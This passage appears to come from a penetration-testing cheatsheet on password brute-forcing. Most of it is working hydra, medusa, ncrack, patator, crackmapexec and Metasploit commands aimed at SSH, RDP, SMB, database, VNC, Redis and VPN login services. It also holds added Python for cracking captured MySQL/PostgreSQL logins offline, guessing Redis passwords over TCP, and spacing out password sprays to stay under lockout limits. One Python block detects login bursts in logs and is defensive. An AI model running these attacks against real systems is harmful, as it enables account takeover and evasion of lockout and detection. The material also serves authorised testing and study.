 # cookies can be specified with C=
 # and we also added a header with H=
 # this header is called X-Foo and has the value Foo

04.2 SSH

## ------------------| Using Hydra
hydra -v -V -u -f -L users.txt -p 'Password!' -t 2 $ip ssh
hydra -v -V -u -f -l root -P /usr/share/wordlists/rockyou.txt -t 2 $ip ssh
hydra -v -V -u -f -L users.txt -P /usr/share/wordlists/rockyou.txt -t 2 $ip ssh

## -v        Verbose mode
## -L        User List
## -P        Password List
## -V        Show login+pass for each attempt
## -u        Loop around users, not passwords (effective! implied with -x)
## -o        Write found login/password pairs to FILE instead of stdout
## -t        Run TASKS number of connects in parallel per target (default: 16)
## -f / -F   Exit when a login/pass pair is found (-M: -f per host, -F global)

## ------------------| Using NCrack
ncrack -v -p 22 --user root -P /usr/share/wordlists/rockyou.txt <IP> -T5

## ------------------| Using Patator
patator ssh_login host=<IP> port=22022 user=sunny password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0  
patator ssh_login -x ignore:fgrep='failed' host=<IP> port=22022 user=sunny password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0          

## ------------------| Using Medusa
medusa -h <IP> -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -M ssh
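The other side of sections 04.1 and 04.2: what the hydra runs above look like in the target's logs, and the detection a defender wants. As an added example (not part of the original notes, and not the output of any real system), the Python below parses constructed Apache access-log lines and sshd auth.log lines into (time, ip, service, success) events and raises an alert when one source IP accumulates a threshold of failures against one service inside a sliding window, noting whether a success followed the burst (the case that matters most). Two assumptions are built in and commented: the web app answers a failed login with 200 and a success with a 302 redirect, and syslog timestamps, which carry no year, are given one. IPs are from the RFC 5737 documentation ranges.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample logs (documentation-range IPs, not real traffic).
ACCESS_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "curl/8.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "curl/8.0"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "curl/8.0"
203.0.113.7 - - [10/Oct/2023:13:55:39 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "curl/8.0"
198.51.100.2 - - [10/Oct/2023:13:55:39 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "curl/8.0"
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "curl/8.0"
198.51.100.2 - - [10/Oct/2023:13:55:41 +0000] "POST /login.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:42 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "curl/8.0"
"""

AUTH_LOG = """\
Oct 10 13:56:00 bastion sshd[2413]: Failed password for root from 203.0.113.7 port 51022 ssh2
Oct 10 13:56:02 bastion sshd[2415]: Failed password for root from 203.0.113.7 port 51024 ssh2
Oct 10 13:56:03 bastion sshd[2417]: Failed password for invalid user admin from 198.51.100.2 port 40010 ssh2
Oct 10 13:56:04 bastion sshd[2419]: Failed password for root from 203.0.113.7 port 51026 ssh2
Oct 10 13:56:06 bastion sshd[2421]: Failed password for root from 203.0.113.7 port 51028 ssh2
Oct 10 13:56:08 bastion sshd[2423]: Failed password for root from 203.0.113.7 port 51030 ssh2
Oct 10 13:56:09 bastion sshd[2425]: Accepted password for root from 203.0.113.7 port 51032 ssh2
"""

ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                       r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')
SSHD_RE = re.compile(r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
                     r'(?P<result>Failed|Accepted) password for (?:invalid user )?\S+ from (?P<ip>\S+)')


def parse_access_log(text, login_path="/login.php"):
    """POST login events as (ts, ip, kind, success). Assumption: the app
    answers a failed login with 200 (the form again) and success with 302."""
    events = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m and m.group("method") == "POST" and m.group("path") == login_path:
            ts = datetime.strptime(m.group("ts")[:20], "%d/%b/%Y:%H:%M:%S")
            events.append((ts, m.group("ip"), "http-login", m.group("status") == "302"))
    return events


def parse_auth_log(text, year=2023):
    """sshd password events; syslog timestamps carry no year, so one is assumed."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=year)
            events.append((ts, m.group("ip"), "ssh", m.group("result") == "Accepted"))
    return events


def detect_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Alert when one source IP accumulates `threshold` failures against one
    service inside `window`; record whether a success followed the burst."""
    recent = defaultdict(deque)   # (ip, kind) -> timestamps of failures in window
    failures = defaultdict(int)   # (ip, kind) -> total failures seen
    alerts = {}
    for ts, ip, kind, success in sorted(events):
        key = (ip, kind)
        if success:
            if key in alerts:
                alerts[key]["success_after_burst"] = True
            continue
        failures[key] += 1
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:     # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(key, {"ip": ip, "kind": kind, "first": q[0],
                                        "success_after_burst": False})
            a["count"], a["last"] = failures[key], ts
    return list(alerts.values())


def run_detection():
    return detect_bursts(parse_access_log(ACCESS_LOG) + parse_auth_log(AUTH_LOG))


if __name__ == "__main__":
    for alert in run_detection():
        print(alert)
```

The `-t 1` / `-t 2` and `-w` options in the hydra lines above exist precisely to slip under a window like this one, so the threshold and window here are a starting point, not a tuned setting; pairing the count with a "success after burst" flag keeps the high-priority alert rare even when the count threshold is set low.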

04.3 SMB

## ------------------| Using Nmap
nmap --script smb-brute -p 445 <IP>

## ------------------| Using CrackMapExec
crackmapexec smb <IP> -u users.txt -p /usr/share/wordlists/rockyou.txt --continue-on-success
crackmapexec smb <IP> -u Hazard -p /usr/share/wordlists/rockyou.txt --shares

## ------------------| Using Hydra
hydra -u -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb

04.4 RDP

## ------------------| Using Hydra
hydra -t 1 -V -f -u -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
hydra -V -f -u -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt rdp://<IP>         

## ------------------| Using NCrack
ncrack -vv --user <UserName> -P /usr/share/wordlists/rockyou.txt rdp://<IP>

## ------------------| Using Crowbar
crowbar -b rdp -s <IP>/CIDR -u <USER> -C /usr/share/wordlists/rockyou.txt
crowbar -b rdp -s <IP>/CIDR -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -C /usr/share/wordlists/rockyou.txt

04.5 LDAP

## ------------------| Nmap (Basic)
nmap --script ldap-brute -p 389 <IP>

## ------------------| Using Hydra
hydra -V -f -u -L users.txt -P /usr/share/wordlists/rockyou.txt <IP> ldap2

## ------------------| Using CrackMapExec
crackmapexec ldap <IP> -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/wordlists/rockyou.txt  

04.6 FTP

## ------------------| Using Hydra
hydra -u -f -l root -P /usr/share/wordlists/rockyou.txt [-t 32] <IP> ftp

## ------------------| Using Ncrack
ncrack -p 21 --user root -P /usr/share/wordlists/rockyou.txt <IP> [-T 5]

## ------------------| Using Medusa
medusa -u root -P /usr/share/wordlists/rockyou.txt -h <IP> -M ftp

04.7 SNMP

## ------------------| Using Nmap
nmap -sU --script snmp-brute <IP> [--script-args snmp-brute.communitiesdb=<wordlist> ]    

## ------------------| Using Hydra
hydra -u -f -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <IP> snmp

## ------------------| Using MSF
use auxiliary/scanner/snmp/snmp_login

## ------------------| Using onesixtyone 
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp_onesixtyone.txt <IP>

04.8 SMTP

hydra -u -f -V -l <username> -P /usr/share/wordlists/rockyou.txt <IP> smtp
### If you need ssl: use S
hydra -u -f -S -v -V -l <username> -P /usr/share/wordlists/rockyou.txt -s 587 <IP> smtp

04.9 WinRM

## ------------------| Using CrackMapExec
crackmapexec winrm <IP> -d <Domain Name> -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/wordlists/rockyou.txt  

04.10 MySQL

## ------------------| Using Hydra
hydra -u -f -l root -P /usr/share/wordlists/rockyou.txt -s 3306 <IP> mysql
hydra -u -f -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -s <PORT> <IP> mysql

04.11 MSSQL

## ------------------| Using Hydra
hydra -u -f -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt <IP> mssql

## ------------------| Using Medusa
medusa -h <IP> -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -M mssql

## ------------------| Using Nmap
### Use the NetBIOS name of the machine as domain
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=/usr/share/seclists/Usernames/top-usernames-shortlist.txt,passdb=/usr/share/wordlists/rockyou.txt,ms-sql-brute.brute-windows-accounts <IP>   

## ------------------| Using Metasploit
## If you have a domain, set it and use USE_WINDOWS_AUTHENT
use auxiliary/scanner/mssql/mssql_login

04.12 MongoDB

## ------------------| Using Nmap
nmap -sV --script mongodb-brute -n -p 27017 <IP>

## ------------------| Using Metasploit
use auxiliary/scanner/mongodb/mongodb_login

04.13 OracleSQL

## ------------------| Using Nmap
sudo nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
### Offline hash brute (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):
sudo nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n <IP>
 
## ------------------| Using Patator
pip3 install cx_Oracle --upgrade
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

## ------------------| Using ODAT (Oracle Database Attacking Tool)
./odat.py passwordguesser -s <SERVER_IP> -d <SID>
./odat.py passwordguesser -s <SERVER_IP> -p <PORT> --accounts-file accounts_multiple.txt

## ------------------| Using Metasploit
use auxiliary/admin/oracle/oracle_login
## or
use auxiliary/scanner/oracle/oracle_login
set RHOSTS <IP>
set RPORT 1521
set SID <SID>

04.15 PostgreSQL

## ------------------| Using Hydra 
hydra -u -f -L usernames.txt -P /usr/share/wordlists/rockyou.txt <IP> postgres

## ------------------| Using Medusa
medusa -h <IP> -U usernames.txt -P /usr/share/wordlists/rockyou.txt -M postgres

## ------------------| Using Ncrack
ncrack -v -U usernames.txt -P /usr/share/wordlists/rockyou.txt <IP>:5432

## ------------------| Using Patator
patator pgsql_login host=<IP> user=FILE0 0=usernames.txt password=FILE1 1=/usr/share/wordlists/rockyou.txt

## ------------------| Using Metasploit
use auxiliary/scanner/postgres/postgres_login

## ------------------| Using Nmap
nmap -sV --script pgsql-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p 5432 <IP>
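
## ------------------| Offline check of a captured login (MySQL / PostgreSQL)
The hydra, medusa, patator and nmap one-liners for MySQL (04.10) and PostgreSQL (04.15) make one network login per guess. When a packet capture of a legitimate login already exists, the same guesses can be verified offline against the captured challenge and response, with no traffic and no lockout risk. The Python below is an added example written for this page, not code from the original cheatsheet or from any of the tools listed; the scramble, salt, usernames and the small wordlist are constructed for the demo, not taken from a real capture.

```python
import hashlib
from typing import Callable, Iterable, Optional


def mysql_native_token(password: str, scramble: bytes) -> bytes:
    """Client auth-response for mysql_native_password.

    token = SHA1(password) XOR SHA1(scramble || SHA1(SHA1(password)))
    `scramble` is the 20-byte server nonce: the 8-byte and 12-byte salt parts
    of the Initial Handshake packet concatenated.
    """
    if len(scramble) != 20:
        raise ValueError("mysql_native_password scramble must be 20 bytes")
    stage1 = hashlib.sha1(password.encode()).digest()
    stage2 = hashlib.sha1(stage1).digest()
    mix = hashlib.sha1(scramble + stage2).digest()
    return bytes(a ^ b for a, b in zip(stage1, mix))


def pgsql_md5_response(password: str, username: str, salt: bytes) -> str:
    """Client PasswordMessage for PostgreSQL AuthenticationMD5Password.

    reply = "md5" + hex(md5( hex(md5(password || username)) || salt ))
    `salt` is the 4 raw bytes in the server's AuthenticationMD5Password ('R') message.
    """
    if len(salt) != 4:
        raise ValueError("PostgreSQL MD5 salt must be 4 bytes")
    inner = hashlib.md5(password.encode() + username.encode()).hexdigest()
    return "md5" + hashlib.md5(inner.encode() + salt).hexdigest()


def crack_offline(candidates: Iterable[str], captured,
                  compute: Callable[[str], object]) -> Optional[str]:
    """Return the first candidate whose computed response equals the captured one."""
    for pw in candidates:
        if compute(pw) == captured:
            return pw
    return None


# Constructed demo data (not from a real capture): a 20-byte MySQL scramble,
# a 4-byte PostgreSQL salt, and a tiny wordlist standing in for rockyou.txt.
SCRAMBLE = bytes(range(20))
PG_SALT = b"\x01\x02\x03\x04"
WORDLIST = ["123456", "password", "letmein", "Winter2023!", "admin"]


def demo():
    # What the clients would have sent on the wire for these two passwords.
    mysql_captured = mysql_native_token("letmein", SCRAMBLE)
    pg_captured = pgsql_md5_response("Winter2023!", "postgres", PG_SALT)
    return (
        crack_offline(WORDLIST, mysql_captured, lambda p: mysql_native_token(p, SCRAMBLE)),
        crack_offline(WORDLIST, pg_captured, lambda p: pgsql_md5_response(p, "postgres", PG_SALT)),
    )


if __name__ == "__main__":
    print("recovered:", demo())   # ('letmein', 'Winter2023!')
```

mysql_native_token applies to accounts that use mysql_native_password (the default up to MySQL 5.7; MySQL 8 defaults to caching_sha2_password, whose exchange is different). pgsql_md5_response applies only where pg_hba.conf still uses md5; PostgreSQL 14+ defaults to scram-sha-256, which exchanges a PBKDF2-based proof and is not covered here. With a real capture, copy the 20-byte scramble out of the Initial Handshake packet and the 4-byte salt out of the AuthenticationMD5Password message in Wireshark and pass them in as bytes.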

04.16 Telnet

## ------------------| Using Hydra
hydra -u -f -l <username> -P /usr/share/wordlists/rockyou.txt telnet://targetname

## ------------------| Using Ncrack
ncrack -p 23 --user root -P /usr/share/wordlists/rockyou.txt <IP> [-T 5]

## ------------------| Using Medusa
medusa -u root -P /usr/share/wordlists/rockyou.txt -h <IP> -M telnet

04.17 VNC

## ------------------| Using Hydra
hydra -f -vV -P /usr/share/wordlists/rockyou.txt -s <PORT> <IP> vnc
### Classic VNC authentication (VncAuth) has no username, only a password, so no user list is needed; the default port is 5900 (5901 for display :1)

## ------------------| Using Medusa
medusa -h <IP> -u root -P /usr/share/wordlists/rockyou.txt -M vnc

## ------------------| Using Ncrack
ncrack -V --user root -P /usr/share/wordlists/rockyou.txt <IP>:5900

## ------------------| Using Patator 
patator vnc_login host=<IP> password=FILE0 0=/usr/share/wordlists/rockyou.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0

## ------------------| Using Metasploit
use auxiliary/scanner/vnc/vnc_login

## ------------------| Using Nmap
nmap -sV --script vnc-brute --script-args passdb=/usr/share/wordlists/rockyou.txt -p 5900 <IP>

04.18 IRC

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p <PORT> <IP>

04.19 ISCSI

nmap -sV --script iscsi-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p 3260 <IP>

04.20 PPTP

cat /usr/share/wordlists/rockyou.txt | thc-pptp-bruter -u <Username> <IP>

04.21 Redis

## ------------------| Using Nmap
nmap --script redis-brute -p 6379 <IP>

## ------------------| Using Hydra
hydra -u -f -P /usr/share/wordlists/rockyou.txt <IP> redis
### No user list: before Redis 6, AUTH takes only a password (requirepass); Redis 6+ with ACLs uses AUTH <user> <password>

## ------------------| Using MSF
use auxiliary/scanner/redis/redis_login
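
## ------------------| What the Redis guessers send on the wire
hydra's redis module and nmap's redis-brute send one RESP-encoded AUTH per guess and read a single-line reply. The script below is an added example written for this page, not code from the original or from those tools; it encodes the command, classifies the server's reply, and stops early when the reply shows further guessing is pointless (no password configured at all, or an unexpected error). The `fake_redis` server and the wordlist are constructed for the offline demo; `tcp_sender` is the only part that touches the network and is not used in the demo.

```python
import socket
from typing import Callable, Iterable, List, Optional, Tuple

Sender = Callable[[bytes], bytes]   # sends one command, returns the raw reply


def resp_command(*parts: str) -> bytes:
    """Encode a command as a RESP array of bulk strings (what redis-cli sends)."""
    out = [f"*{len(parts)}\r\n".encode()]
    for p in parts:
        b = p.encode()
        out.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(out)


def parse_resp_array(raw: bytes) -> List[str]:
    """Decode a RESP array of bulk strings back into its arguments (used by the fake server)."""
    lines = raw.decode().split("\r\n")
    count = int(lines[0][1:])
    return [lines[2 + 2 * i] for i in range(count)]


def classify_auth_reply(reply: bytes) -> str:
    """Map Redis' one-line reply to AUTH onto: ok / wrong / noauth-needed / other."""
    line = reply.split(b"\r\n", 1)[0]
    if line == b"+OK":
        return "ok"
    if line.startswith(b"-WRONGPASS") or line == b"-ERR invalid password":
        return "wrong"                       # Redis >= 6 wording / Redis < 6 wording
    if b"without any password configured" in line or b"no password is set" in line:
        return "noauth-needed"               # no requirepass at all: just connect
    return "other"


def guess_auth(send: Sender, passwords: Iterable[str],
               username: Optional[str] = None) -> Tuple[str, Optional[str]]:
    """Try each password with AUTH; stop as soon as the server says more is pointless."""
    for pw in passwords:
        cmd = resp_command("AUTH", username, pw) if username else resp_command("AUTH", pw)
        status = classify_auth_reply(send(cmd))
        if status == "ok":
            return "ok", pw
        if status in ("noauth-needed", "other"):
            return status, None
    return "exhausted", None


def tcp_sender(host: str, port: int = 6379, timeout: float = 3.0) -> Sender:
    """One TCP connection per attempt against a real server (not used in the offline demo)."""
    def send(raw: bytes) -> bytes:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(raw)
            return s.recv(4096)
    return send


def fake_redis(requirepass: Optional[str]) -> Sender:
    """Constructed stand-in for a Redis 6 server that answers only AUTH, for the offline demo."""
    def send(raw: bytes) -> bytes:
        args = parse_resp_array(raw)
        if args[0].upper() != "AUTH":
            return b"-ERR unknown command\r\n"
        if requirepass is None:
            return (b"-ERR AUTH <password> called without any password configured "
                    b"for the default user. Are you sure your configuration is correct?\r\n")
        if args[-1] == requirepass:
            return b"+OK\r\n"
        return b"-WRONGPASS invalid username-password pair or user is disabled.\r\n"
    return send


if __name__ == "__main__":
    wordlist = ["123456", "password", "s3cret"]        # constructed stand-in for rockyou.txt
    print(guess_auth(fake_redis("s3cret"), wordlist))  # ('ok', 's3cret')
    print(guess_auth(fake_redis(None), wordlist))      # ('noauth-needed', None)
```

Against a live target, replace `fake_redis(...)` with `tcp_sender("<IP>")`; a "noauth-needed" result means the instance has no requirepass and every subsequent guess would only add noise to its log.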

04.22 Rexec

hydra -u -f -v -V -l <username> -P /usr/share/wordlists/rockyou.txt rexec://<Victim-IP>

04.23 Rlogin

hydra -v -V -u -f -l <username> -P /usr/share/wordlists/rockyou.txt rlogin://<Victim-IP>

04.24 OWA

## ------------------| Create Usernames List (the default is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt

## ------------------| Bruteforce
python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01         

## ------------------| Using Spray.sh
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestsFile>

04.25 Lync

wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -lync <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>            

04.26 CISCO Web VPN

wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -cisco <targetURL> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>

04.27 OpenVPN Web Portal

wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -ovpn <targetIP> <targetPort> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
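
## ------------------| Lockout-aware spray schedule
spray.sh's <AttemptsPerLockoutPeriod> and <LockoutPeriodInMinutes> arguments (OWA, Lync, Cisco Web VPN and OpenVPN above) describe one scheduling problem, and atomizer's --interval is a cruder answer to it: try one password across every user before moving to the next (the user-major order hydra's -u also gives), and never exceed the lockout threshold for any user inside one observation window. The Python below is an added example written for this page, not spray.sh's or atomizer's code; it implements that schedule with the login step and the sleep injected, so the dry run makes no network requests. `fake_attempt` and the users and passwords are constructed.

```python
import time
from typing import Callable, Dict, List, Tuple

Attempt = Callable[[str, str], bool]   # (user, password) -> did the login succeed?


def spray_batches(passwords: List[str], attempts_per_window: int) -> List[List[str]]:
    """Cut the password list into batches; one batch costs each user at most
    `attempts_per_window` bad logins inside a single lockout observation window."""
    if attempts_per_window < 1:
        raise ValueError("attempts_per_window must be >= 1")
    return [passwords[i:i + attempts_per_window]
            for i in range(0, len(passwords), attempts_per_window)]


def spray(users: List[str], passwords: List[str], attempts_per_window: int,
          window_minutes: float, attempt: Attempt,
          sleep: Callable[[float], None] = time.sleep,
          ) -> Tuple[Dict[str, str], List[Tuple[str, str]], List[float]]:
    """User-major spray: one password across every user before the next password.

    Returns (found, attempt_log, waits). Cracked users are dropped from later
    rounds so their lockout budget is not spent on pointless guesses. Between
    batches the full window is waited out starting after the batch's last
    attempt, which is when an AD-style bad-password counter was last touched.
    """
    found: Dict[str, str] = {}
    log: List[Tuple[str, str]] = []
    waits: List[float] = []
    batches = spray_batches(passwords, attempts_per_window)
    for i, batch in enumerate(batches):
        for pw in batch:
            for user in users:
                if user in found:
                    continue
                log.append((user, pw))
                if attempt(user, pw):
                    found[user] = pw
        if len(found) == len(users):
            break                      # nothing left to spray; skip the wait
        if i + 1 < len(batches):
            wait = window_minutes * 60.0
            waits.append(wait)
            sleep(wait)
    return found, log, waits


if __name__ == "__main__":
    # Constructed dry run: no network; `fake_attempt` recognises exactly one
    # pair and the injected sleep only reports how long a real run would pause.
    def fake_attempt(user: str, pw: str) -> bool:
        return (user, pw) == ("bob", "Summer2023")

    found, log, waits = spray(["alice", "bob"], ["Winter2023", "Summer2023", "Autumn2023"],
                              attempts_per_window=2, window_minutes=30,
                              attempt=fake_attempt,
                              sleep=lambda s: print(f"would sleep {s:.0f}s"))
    print(found, len(log), "attempts")   # {'bob': 'Summer2023'} 5 attempts
```

Choose attempts_per_window at least one below the policy's lockout threshold (on Active Directory, Get-ADDefaultDomainPasswordPolicy or net accounts shows the threshold and the observation window), and keep in mind that badPwdCount only resets once the observation window has elapsed since the last bad attempt, which is why the wait starts after a batch's final attempt rather than at its first.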
